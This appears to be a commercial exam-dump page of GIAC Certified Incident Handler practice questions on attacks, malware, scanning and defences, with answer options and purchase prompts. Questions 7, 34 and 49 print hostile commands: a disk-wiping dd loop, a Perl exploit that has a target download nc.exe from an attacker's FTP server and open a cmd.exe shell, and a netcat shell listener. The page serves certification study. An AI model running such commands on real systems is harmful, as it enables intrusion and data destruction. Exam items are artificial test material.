New Year Special Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: cramtick70

GCIH GIAC Certified Incident Handler Questions and Answers

Questions 4

John is a malicious attacker. He illegally accesses the server of We-are-secure Inc. He then places a backdoor in the We-are-secure server and alters its log files. Which of the following steps of malicious hacking includes altering the server log files?

Options:

A.

Maintaining access

B.

Covering tracks

C.

Gaining access

D.

Reconnaissance

Buy Now
Questions 5

Which of the following are the rules by which an organization operates?

Options:

A.

Acts

B.

Policies

C.

Rules

D.

Manuals

Buy Now
Questions 6

John works as a Network Administrator for We-are-secure Inc. He finds that TCP port 7597 of the Weare- secure server is open. He suspects that it may be open due to a Trojan installed on the server. He presents a report to the company describing the symptoms of the Trojan. A summary of the report is given below:

Once this Trojan has been installed on the computer, it searches Notpad.exe, renames it Note.com, and then copies itself to the computer as Notepad.exe. Each time Notepad.exe is executed, the Trojan executes and calls the original Notepad to avoid being noticed.

Which of the following Trojans has the symptoms as the one described above?

Options:

A.

NetBus

B.

Qaz

C.

eBlaster

D.

SubSeven

Buy Now
Questions 7

Adam, a malicious hacker has successfully gained unauthorized access to the Linux system of Umbrella Inc. Web server of the company runs on Apache. He has downloaded sensitive documents and database files from the computer.

After performing these malicious tasks, Adam finally runs the following command on the Linux command box before disconnecting.

for (( i = 0;i<11;i++ )); do dd if=/dev/random of=/dev/hda && dd if=/dev/zero of=/dev/hda done

Which of the following actions does Adam want to perform by the above command?

Options:

A.

Infecting the hard disk with polymorphic virus strings.

B.

Deleting all log files present on the system.

C.

Wiping the contents of the hard disk with zeros.

D.

Making a bit stream copy of the entire hard disk for later download.

Buy Now
Questions 8

Which of the following types of scan does not open a full TCP connection?

Options:

A.

FIN scan

B.

ACK scan

C.

Stealth scan

D.

Idle scan

Buy Now
Questions 9

The IT administrator wants to implement a stronger security policy. What are the four most important security priorities for PassGuide Software Systems Pvt. Ltd.?

Options:

A.

Providing secure communications between the overseas office and the headquarters.

B.

Implementing Certificate services on Texas office.

C.

Protecting employee data on portable computers.

D.

Providing two-factor authentication.

E.

Ensuring secure authentication.

F.

Preventing unauthorized network access.

G.

Providing secure communications between Washington and the headquarters office.

Buy Now
Questions 10

Which of the following rootkits patches, hooks, or replaces system calls with versions that hide information about the attacker?

Options:

A.

Library rootkit

B.

Kernel level rootkit

C.

Hypervisor rootkit

D.

Boot loader rootkit

Buy Now
Questions 11

Which of the following functions in c/c++ can be the cause of buffer overflow?

Each correct answer represents a complete solution. Choose two.

Options:

A.

printf()

B.

strcat()

C.

strcpy()

D.

strlength()

Buy Now
Questions 12

Which of the following is a type of computer security vulnerability typically found in Web applications that allow code injection by malicious Web users into the Web pages viewed by other users?

Options:

A.

SID filtering

B.

Cookie poisoning

C.

Cross-site scripting

D.

Privilege Escalation

Buy Now
Questions 13

Which of the following attacks can be overcome by applying cryptography?

Options:

A.

Buffer overflow

B.

Web ripping

C.

Sniffing

D.

DoS

Buy Now
Questions 14

Which of the following is executed when a predetermined event occurs?

Options:

A.

Trojan horse

B.

Logic bomb

C.

MAC

D.

Worm

Buy Now
Questions 15

Adam works as a Penetration Tester for Umbrella Inc. A project has been assigned to him check the security of wireless network of the company. He re-injects a captured wireless packet back onto the network. He does this hundreds of times within a second. The packet is correctly encrypted and Adam assumes it is an ARP request packet. The wireless host responds with a stream of responses, all individually encrypted with different IVs.

Which of the following types of attack is Adam performing?

Options:

A.

Replay attack

B.

MAC Spoofing attack

C.

Caffe Latte attack

D.

Network injection attack

Buy Now
Questions 16

Which of the following types of attacks is often performed by looking surreptitiously at the keyboard or monitor of an employee's computer?

Options:

A.

Buffer-overflow attack

B.

Shoulder surfing attack

C.

Man-in-the-middle attack

D.

Denial-of-Service (DoS) attack

Buy Now
Questions 17

Against which of the following does SSH provide protection?

Each correct answer represents a complete solution. Choose two.

Options:

A.

DoS attack

B.

IP spoofing

C.

Password sniffing

D.

Broadcast storm

Buy Now
Questions 18

Which of the following are the automated tools that are used to perform penetration testing?

Each correct answer represents a complete solution. Choose two.

Options:

A.

Pwdump

B.

Nessus

C.

EtherApe

D.

GFI LANguard

Buy Now
Questions 19

Which of the following netcat parameters makes netcat a listener that automatically restarts itself when a connection is dropped?

Options:

A.

-u

B.

-l

C.

-p

D.

-L

Buy Now
Questions 20

Your friend plans to install a Trojan on your computer. He knows that if he gives you a new version of chess.exe, you will definitely install the game on your computer. He picks up a Trojan and joins it with chess.exe. Which of the following tools are required in such a scenario?

Each correct answer represents a part of the solution. Choose three.

Options:

A.

NetBus

B.

Absinthe

C.

Yet Another Binder

D.

Chess.exe

Buy Now
Questions 21

Which of the following attacks are examples of Denial-of-service attacks (DoS)?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Fraggle attack

B.

Smurf attack

C.

Birthday attack

D.

Ping flood attack

Buy Now
Questions 22

A user is sending a large number of protocol packets to a network in order to saturate its resources and to disrupt connections to prevent communications between services. Which type of attack is this?

Options:

A.

Vulnerability attack

B.

Impersonation attack

C.

Social Engineering attack

D.

Denial-of-Service attack

Buy Now
Questions 23

As a professional hacker, you want to crack the security of secureserver.com. For this, in the information gathering step, you performed scanning with the help of nmap utility to retrieve as many different protocols as possible being used by the secureserver.com so that you could get the accurate knowledge about what services were being used by the secure server.com. Which of the following nmap switches have you used to accomplish the task?

Options:

A.

nmap -vO

B.

nmap -sS

C.

nmap -sT

D.

nmap -sO

Buy Now
Questions 24

Which of the following programs can be used to detect stealth port scans performed by a malicious hacker?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

nmap

B.

scanlogd

C.

libnids

D.

portsentry

Buy Now
Questions 25

You are hired as a Database Administrator for Jennifer Shopping Cart Inc. You monitor the server health through the System Monitor and found that there is a sudden increase in the number of logins.

Which of the following types of attack has occurred?

Options:

A.

Injection

B.

Virus

C.

Worm

D.

Denial-of-service

Buy Now
Questions 26

You want to perform passive footprinting against we-are-secure Inc. Web server. Which of the following tools will you use?

Options:

A.

Nmap

B.

Ethereal

C.

Ettercap

D.

Netcraft

Buy Now
Questions 27

The Klez worm is a mass-mailing worm that exploits a vulnerability to open an executable attachment even in Microsoft Outlook's preview pane. The Klez worm gathers email addresses from the entries of the default Windows Address Book (WAB). Which of the following registry values can be used to identify this worm?

Options:

A.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

B.

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

C.

HKEY_CURRENT_USER\Software\Microsoft\WAB\WAB4\Wab File Name = "file and pathname of the WAB file"

D.

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

Buy Now
Questions 28

Which of the following functions can be used as a countermeasure to a Shell Injection attack?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

escapeshellarg()

B.

mysql_real_escape_string()

C.

regenerateid()

D.

escapeshellcmd()

Buy Now
Questions 29

Adam, a novice computer user, works primarily from home as a medical professional. He just bought a brand new Dual Core Pentium computer with over 3 GB of RAM. After about two months of working on his new computer, he notices that it is not running nearly as fast as it used to. Adam uses antivirus software, anti-spyware software, and keeps the computer up-to-date with Microsoft patches. After another month of working on the computer, Adam finds that his computer is even more noticeably slow. He also notices a window or two pop-up on his screen, but they quickly disappear. He has seen these windows show up, even when he has not been on the Internet. Adam notices that his computer only has about 10 GB of free space available. Since his hard drive is a 200 GB hard drive, Adam thinks this is very odd.

Which of the following is the mostly likely the cause of the problem?

Options:

A.

Computer is infected with the stealth kernel level rootkit.

B.

Computer is infected with stealth virus.

C.

Computer is infected with the Stealth Trojan Virus.

D.

Computer is infected with the Self-Replication Worm.

Buy Now
Questions 30

Many organizations create network maps of their network system to visualize the network and understand the relationship between the end devices and the transport layer that provide services.

Which of the following are the techniques used for network mapping by large organizations?

Each correct answer represents a complete solution. Choose three.

Options:

A.

Packet crafting

B.

Route analytics

C.

SNMP-based approaches

D.

Active Probing

Buy Now
Questions 31

Which of the following statements are true about session hijacking?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

Use of a long random number or string as the session key reduces session hijacking.

B.

It is used to slow the working of victim's network resources.

C.

TCP session hijacking is when a hacker takes over a TCP session between two machines.

D.

It is the exploitation of a valid computer session to gain unauthorized access to information or services in a computer system.

Buy Now
Questions 32

You work as a Penetration Tester for the Infosec Inc. Your company takes the projects of security auditing. Recently, your company has assigned you a project to test the security of the we-aresecure.com Web site. For this, you want to perform the idle scan so that you can get the ports open in the we-are-secure.com server. You are using Hping tool to perform the idle scan by using a zombie computer. While scanning, you notice that every IPID is being incremented on every query, regardless whether the ports are open or close. Sometimes, IPID is being incremented by more than one value.

What may be the reason?

Options:

A.

The firewall is blocking the scanning process.

B.

The zombie computer is not connected to the we-are-secure.com Web server.

C.

The zombie computer is the system interacting with some other system besides your computer.

D.

Hping does not perform idle scanning.

Buy Now
Questions 33

Which of the following types of attacks is mounted with the objective of causing a negative impact on the performance of a computer or network?

Options:

A.

Vulnerability attack

B.

Man-in-the-middle attack

C.

Denial-of-Service (DoS) attack

D.

Impersonation attack

Buy Now
Questions 34

Adam, a malicious hacker performs an exploit, which is given below:

#####################################################

$port = 53;

# Spawn cmd.exe on port X

$your = "192.168.1.1";# Your FTP Server 89

$user = "Anonymous";# login as

$pass = 'noone@nowhere.com';# password

#####################################################

$host = $ARGV[0];

print "Starting ...\n";

print "Server will download the file nc.exe from $your FTP server.\n"; system("perl msadc.pl -h $host -C \"echo

open $your >sasfile\""); system("perl msadc.pl -h $host -C \"echo $user>>sasfile\""); system("perl msadc.pl -h

$host -C \"echo $pass>>sasfile\""); system("perl msadc.pl -h $host -C \"echo bin>>sasfile\""); system("perl msadc.pl -h $host -C \"echo get nc.exe>>sasfile\""); system("perl msadc.pl -h $host –C \"echo get hacked. html>>sasfile\""); system("perl msadc.pl -h $host -C \"echo quit>>sasfile\""); print "Server is downloading ...

\n";

system("perl msadc.pl -h $host -C \"ftp \-s\:sasfile\""); print "Press ENTER when download is finished ...

(Have a ftp server)\n";

$o=; print "Opening ...\n";

system("perl msadc.pl -h $host -C \"nc -l -p $port -e cmd.exe\""); print "Done.\n"; #system("telnet $host $port"); exit(0);

Which of the following is the expected result of the above exploit?

Options:

A.

Creates a share called "sasfile" on the target system

B.

Creates an FTP server with write permissions enabled

C.

Opens up a SMTP server that requires no username or password

D.

Opens up a telnet listener that requires no username or password

Buy Now
Questions 35

Ryan, a malicious hacker submits Cross-Site Scripting (XSS) exploit code to the Website of Internet forum for online discussion. When a user visits the infected Web page, code gets automatically executed and Ryan can easily perform acts like account hijacking, history theft etc. Which of the following types of Cross-Site Scripting attack Ryan intends to do?

Options:

A.

Non persistent

B.

Document Object Model (DOM)

C.

SAX

D.

Persistent

Buy Now
Questions 36

What is the major difference between a worm and a Trojan horse?

Options:

A.

A worm spreads via e-mail, while a Trojan horse does not.

B.

A worm is a form of malicious program, while a Trojan horse is a utility.

C.

A worm is self replicating, while a Trojan horse is not.

D.

A Trojan horse is a malicious program, while a worm is an anti-virus software.

Buy Now
Questions 37

Which of the following is a computer worm that caused a denial of service on some Internet hosts and dramatically slowed down general Internet traffic?

Options:

A.

Klez

B.

Code red

C.

SQL Slammer

D.

Beast

Buy Now
Questions 38

You see the career section of a company's Web site and analyze the job profile requirements. You conclude that the company wants professionals who have a sharp knowledge of Windows server 2003 and Windows active directory installation and placement. Which of the following steps are you using to perform hacking?

Options:

A.

Scanning

B.

Covering tracks

C.

Reconnaissance

D.

Gaining access

Buy Now
Questions 39

Adam works as a Security Administrator for Umbrella Inc. A project has been assigned to him to secure access to the network of the company from all possible entry points. He segmented the network into several subnets and installed firewalls all over the network. He has placed very stringent rules on all the firewalls, blocking everything in and out except the ports that must be used. He does need to have port 80 open since his company hosts a website that must be accessed from the Internet. Adam is still worried about the programs like Hping2 that can get into a network through covert channels.

Which of the following is the most effective way to protect the network of the company from an attacker using Hping2 to scan his internal network?

Options:

A.

Block all outgoing traffic on port 21

B.

Block all outgoing traffic on port 53

C.

Block ICMP type 13 messages

D.

Block ICMP type 3 messages

Buy Now
Questions 40

Which of the following tools can be used to detect the steganography?

Options:

A.

Dskprobe

B.

Blindside

C.

ImageHide

D.

Snow

Buy Now
Questions 41

John works as a professional Ethical Hacker. He has been assigned a project to test the security of www.we-are-secure.com. He performs Web vulnerability scanning on the We-are-secure server. The output of the scanning test is as follows:

C:\whisker.pl -h target_IP_address

-- whisker / v1.4.0 / rain forest puppy / www.wiretrip.net -- = - = - = - = - =

= Host: target_IP_address

= Server: Apache/1.3.12 (Win32) ApacheJServ/1.1

mod_ssl/2.6.4 OpenSSL/0.9.5a mod_perl/1.22

+ 200 OK: HEAD /cgi-bin/printenv

John recognizes /cgi-bin/printenv vulnerability ('Printenv' vulnerability) in the We_are_secure server. Which of the following statements about 'Printenv' vulnerability are true?

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

This vulnerability helps in a cross site scripting attack.

B.

'Printenv' vulnerability maintains a log file of user activities on the Website, which may be useful for the attacker.

C.

The countermeasure to 'printenv' vulnerability is to remove the CGI script.

D.

With the help of 'printenv' vulnerability, an attacker can input specially crafted links and/or other malicious scripts.

Buy Now
Questions 42

You run the following PHP script:

<?php $name = mysql_real_escape_string($_POST["name"]);

$password = mysql_real_escape_string($_POST["password"]); ?>

What is the use of the mysql_real_escape_string() function in the above script.

Each correct answer represents a complete solution. Choose all that apply.

Options:

A.

It can be used to mitigate a cross site scripting attack.

B.

It can be used as a countermeasure against a SQL injection attack.

C.

It escapes all special characters from strings $_POST["name"] and $_POST["password"] except ' and ".

D.

It escapes all special characters from strings $_POST["name"] and $_POST["password"].

Buy Now
Questions 43

Which of the following wireless network security solutions refers to an authentication process in which a user can connect wireless access points to a centralized server to ensure that all hosts are properly authenticated?

Options:

A.

Remote Authentication Dial-In User Service (RADIUS)

B.

IEEE 802.1x

C.

Wired Equivalent Privacy (WEP)

D.

Wi-Fi Protected Access 2 (WPA2)

Buy Now
Questions 44

Which of the following hacking tools provides shell access over ICMP?

Options:

A.

John the Ripper

B.

Nmap

C.

Nessus

D.

Loki

Buy Now
Questions 45

Which of the following strategies allows a user to limit access according to unique hardware information supplied by a potential client?

Options:

A.

Extensible Authentication Protocol (EAP)

B.

WEP

C.

MAC address filtering

D.

Wireless Transport Layer Security (WTLS)

Buy Now
Questions 46

Which of the following is the method of hiding data within another media type such as graphic or document?

Options:

A.

Spoofing

B.

Steganography

C.

Packet sniffing

D.

Cryptanalysis

Buy Now
Questions 47

Alice wants to prove her identity to Bob. Bob requests her password as proof of identity, which Alice dutifully provides (possibly after some transformation like a hash function); meanwhile, Eve is eavesdropping the conversation and keeps the password. After the interchange is over, Eve connects to Bob posing as Alice; when asked for a proof of identity, Eve sends Alice's password read from the last session, which Bob accepts. Which of the following attacks is being used by Eve?

Options:

A.

Replay

B.

Firewalking

C.

Session fixation

D.

Cross site scripting

Buy Now
Questions 48

Maria works as the Chief Security Officer for PassGuide Inc. She wants to send secret messages to the CEO of the company. To secure these messages, she uses a technique of hiding a secret message within an ordinary message. The technique provides 'security through obscurity'. What technique is Maria using?

Options:

A.

Steganography

B.

Public-key cryptography

C.

RSA algorithm

D.

Encryption

Buy Now
Questions 49

You execute the following netcat command:

c:\target\nc -1 -p 53 -d -e cmd.exe

What action do you want to perform by issuing the above command?

Options:

A.

Listen the incoming data and performing port scanning

B.

Capture data on port 53 and performing banner grabbing

C.

Capture data on port 53 and delete the remote shell

D.

Listen the incoming traffic on port 53 and execute the remote shell

Buy Now
Exam Code: GCIH
Exam Name: GIAC Certified Incident Handler
Last Update: Dec 27, 2024
Questions: 328
GCIH pdf

GCIH PDF

$25.5  $84.99
GCIH Engine

GCIH Testing Engine

$30  $99.99
GCIH PDF + Engine

GCIH PDF + Testing Engine

$40.5  $134.99